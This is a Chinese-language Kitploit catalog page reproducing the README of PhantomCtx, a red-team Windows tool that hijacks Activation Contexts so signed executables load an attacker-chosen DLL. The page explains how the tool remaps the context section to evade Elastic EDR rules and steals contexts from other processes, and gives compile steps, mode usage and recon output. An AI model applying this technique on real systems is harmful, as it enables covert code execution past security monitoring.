Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PhantomCtx — 激活上下文劫持规避工具 | Kitploit
工具/GitHubGitHub/r3xmax/phantomctx
权限提升漏洞利用后渗透利用红队Payload 开发二进制利用
GitHubr3xmax/phantomctx

PhantomCtx

激活上下文劫持规避工具

查看仓库
3065283个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PhantomCtx

PhantomCtx 是一款自动化 激活上下文(Activation Context) 劫持的工具,其目标是在绝大多数已签名可执行文件(例如 Microsoft、Adobe、Mozilla)中加载任意 DLL。

该加载器被定位为传统 DLL 劫持与侧加载(DLL Hijacking & Sideloading) 的现代替代方案:与传统方法不同,它不需要存在易受攻击的二进制文件。只要目标可执行文件 通过其导入地址表(Import Address Table, IAT)解析 DLL,或者在最坏情况下通过 LoadLibrary 且不使用绝对路径来解析 DLL,即可执行该技术。```c C:\PhantomCtx\x64>.\PhantomCtx.exe

            +----------------------------------+
            |         PhantomCtx v1.0          |
            +----------------------------------+

Usage: PhantomCtx.exe -m [MODE] [OPTIONS]

Modes: -m recon Displays information about the Activation Context DLL redirections of a running process or one to be spawned.

    -m spawn        Perform Activation Context Hijacking using an on-disk executable
                    (preferably a signed binary for OPSEC purposes).

    -m runtime      Perform Activation Context Hijacking on an already running process.
若要深入了解其内部工作原理以及如何规避激进的 EDR 解决方案,请查看[我的技术博客](https://rexmax.dev/posts/phantomctx-new-approach-to-activation-context-hijacking-for-edr-evasion/)上的文章。

# 目录

- [内部机制](#internal-mechanism)
  - [一种专注于 EDR 规避的激活上下文劫持新方法](#a-new-method-for-activation-context-hijacking-focused-on-edr-evasion)
- [如何编译](#how-to-compile)
- [用法:基于模块的工作流](#usage-module-based-workflow)
  - [侦察](#recon)
  - [Spawn(推荐)](#spawn-recommended)
  - [运行时](#runtime)
- [示例:激活上下文劫持 + DLL 代理 mpnotify.exe](#example-activation-context-hijacking--dll-proxying-mpnotifyexe)
- [免责声明](#disclaimer)
- [参考](#references)

# 内部机制

`PhantomCtx` 滥用大多数进程中都存在的 **合法** Windows 功能,即 **激活上下文(Activation Contexts)**。根据 Microsoft 的说法:

>[_激活上下文_](https://learn.microsoft.com/en-us/windows/win32/sbscs/a-sbscs-gly) 是内存中的数据结构,系统可利用其中信息将应用程序重定向 **为加载特定 DLL 版本**、COM 对象实例或自定义窗口版本...

当 Windows 加载程序解析 DLL(通过 `LoadLibrary` 或导入表)时,它会遵循已定义的解析顺序:

1. DLL 重定向
2. API 集
3. **SxS 清单重定向**
4. 已加载模块列表
5. 已知 DLL
6. 进程包依赖关系图  
7 – 12. 磁盘上的标准文件搜索顺序

`PhantomCtx` 针对第 3 步:**SxS 清单重定向**。激活上下文源自与可执行文件关联的[并行程序集](https://en.wikipedia.org/wiki/Side-by-side_assembly)(`.manifest`)文件,通常嵌入在 PE 二进制文件中。在内部,激活上下文包含一个 **目录(Table of Contents,ToC)**,为多个节建立索引,包括 **DLL 重定向节**。加载程序通常通过 `PEB.ActivationContextData` 访问激活上下文。

[Kurosh Dabbagh Escalante](https://github.com/Kudaes) 的研究表明,可以使用 `CreateActCtxW` 构造恶意激活上下文,将其写入目标进程的 `RW` 内存,然后通过覆盖 `PEB.ActivationContextData` 使其指向构造的结构来激活。

一旦被劫持,加载程序会解析恶意激活上下文中定义的 DLL 重定向,**将库解析重定向**到攻击者控制的路径。

作为其研究的一部分而开发的名为 `Eclipse` 的加载程序可在其[官方仓库](https://github.com/Kudaes/Eclipse)中找到。

## 一种专注于 EDR 规避的激活上下文劫持新方法

经过多次测试,`Eclipse` 在以下位置被 Elastic 等激进 EDR 检测到:

- `Potential Suspended Process Code Injection`:挂起的进程创建,随后使用 `NtWriteVirtualMemory` 将 AC 数据块复制到远程进程。
- `Remote Process Memory Write by Low Reputation Module`:调用栈中没有 `CreateProcess` 的 `NtWriteVirtualMemory` 以及低信誉模块,用于覆盖 `PEB.ActivationContextData`。
- `Remote Memory Write to Trusted Target Process`:调用栈中没有 `CreateProcess` 的 `WriteProcessMemory`,仅限系统/用户安装的二进制文件。

经过一天的研究,寻找可在 `PhantomCtx` 中实现的替代方法,我发现 **原始激活上下文的内存区域是进程创建期间映射的一个节视图**。可以 **使用 `NtUnmapViewOfSection` 取消映射该节视图**,然后创建一个由恶意激活上下文支持的新只读节视图,并将其映射到原始节视图所在的 **完全相同的内存地址**。

因此,加载程序 **不再需要** 覆盖 `PEB.ActivationContextData` 指针。这消除了使用 `NtAllocateVirtualMemory` 和 `NtWriteVirtualMemory` 的必要性,从而绕过所有与远程进程内存写入和注入相关的 EDR 监控规则。

此外,为了提高检测难度,`PhantomCtx` 不使用 `CreateActCtxW`,因此在攻击过程中无需处理 `.manifest` 文件。根据所选模式,它可以使用 `NtReadVirtualMemory` **从另一个包含有效 DLL 重定向节的远程进程中窃取激活上下文**,在本地重建 DLL 重定向条目、对其进行修补,然后替换原始上下文。

# 如何编译

要编译该工具,建议使用 Visual Studio 或兼容的编译器。

如果使用 VS,请打开 `x64 Native Tools Command Prompt for VS`,导航到项目根目录,然后使用 `compile.bat` 进行编译:```
C:\PhantomCtx>.\compile.bat
[INFO] Created output directory: x64
[INFO] Compiling PhantomCtx...
main.c
utils.c
recon.c
actctx.c
c_runtime.c
dynamic_resolution.c
process_utils.c
spawn.c
runtime.c
Generating Code...
[SUCCESSFUL] Build successful: x64\PhantomCtx.exe

Usage: 基于模块的工作流

该工具采用模块化架构设计,在简化开发的同时,为操作者提供清晰、分步骤的工作流。

每个模块在利用工作流中都扮演着特定的角色。

请花一点时间了解每个模块的用途,以充分发挥该工具的全部能力!!!

攻击既可以针对待生成的进程(推荐)执行,也可以针对已运行的进程执行。该工具旨在同时处理这两种场景。```c C:\PhantomCtx\x64>.\PhantomCtx.exe

            +----------------------------------+
            |         PhantomCtx v1.0          |
            +----------------------------------+

Usage: PhantomCtx.exe -m [MODE] [OPTIONS]

Modes: -m recon Displays information about the Activation Context DLL redirections of a running process or one to be spawned.

    -m spawn        Perform Activation Context Hijacking using an on-disk executable
                    (preferably a signed binary for OPSEC purposes).

    -m runtime      Perform Activation Context Hijacking on an already running process.
## Recon

`recon` 模式专注于解析目标程序或运行中进程的激活上下文(Activation Context)。它是应首先执行的模块,因为它决定在利用工作流中应使用哪个利用子模块。```c
C:\PhantomCtx\x64>.\PhantomCtx.exe -m recon -h

                +----------------------------------+
                |         PhantomCtx v1.0          |
                +----------------------------------+

  Usage:
        PhantomCtx.exe -m recon -s [SUBMODE] -p [PROCESS_NAME|PATH]

  Submodes:
        -s spawn        Spawn a process in suspended mode to retrieve its
                        Activation Context DLL redirection information.

        -s runtime      Attach to a currently running process to retrieve its
                        Activation Context DLL redirection information.

  Examples:
        PhantomCtx.exe -m recon -s spawn   -p C:\path\to\target.exe
        PhantomCtx.exe -m recon -s runtime -p target.exe

作为示例,我们使用已签名的 Microsoft 二进制文件 mpnotify.exe。第一步是确定它是否包含带有 DLL 重定向节的有效 Activation Context。

如果没有,该工具建议使用 spawn 或 runtime 模式下的 steal-context 子模块,该子模块从另一个包含有效重定向节的进程中检索 Activation Context。```c C:\PhantomCtx\x64>.\PhantomCtx.exe -m recon -s spawn -p "C:\Windows\System32\mpnotify.exe" [SUCCESS] Suspended process created... [SUCCESS] Activation Context Data Blob copied to local heap buffer @00000294CEA79CD0 (916 bytes)

+-[ ACTIVATION CONTEXT DATA ] | Magic : 0x78746341 (Actx) | HeaderSize : 0x20 (32 bytes) | FormatVersion : 1 | TotalSize : 0x394 (916 bytes) | Flags : 0x00000000 | +--[ TOC ] 6 entries | [00] Id=1 Format=1 Offset=0x00D4 Length=0x0218 | [01] Id=4 Format=2 Offset=0x02EC Length=0x0028 | [02] Id=5 Format=2 Offset=0x0314 Length=0x0028 | [03] Id=6 Format=2 Offset=0x033C Length=0x0028 | [04] Id=9 Format=2 Offset=0x0364 Length=0x0028 | [05] Id=11 Format=1 Offset=0x038C Length=0x0008 | +--[ DLL REDIRECTION ] not present in this blob | +--[ HINT ] Use 'steal-context' to steal the Activation Context from a running process that has one. Example: -m spawn|runtime -s steal-context -p -d --dll-path --steal-from

如果目标程序或进程的 Activation Context 包含有效的 DLL 重定向节,最有效的方法是使用 `spawn` 或 `runtime` 利用模式中的 `add-entry` 或 `patch-entry` 子模块。

## Spawn(推荐)

`spawn` 模式旨在通过从目标系统上的签名可执行文件生成进程来执行 Activation Context 劫持。

由于操作简单且可靠性高,此方法是**最推荐**且经过全面测试的。```c
C:\PhantomCtx\x64>.\PhantomCtx.exe -m spawn -h

                +----------------------------------+
                |         PhantomCtx v1.0          |
                +----------------------------------+

  Usage:
        PhantomCtx.exe -m spawn -s [SUBMODE] -p [PATH] [OPTIONS]

  Submodes:
        -s steal-context        Spawn a process and hijack its Activation Context
                                by stealing the context from another running process.

        -s add-entry            Spawn a process and hijack its Activation Context
                                by adding a new DLL redirection entry.

        -s patch-entry          Spawn a process and hijack its Activation Context
                                by patching the path of an existing DLL redirection entry.
下载工具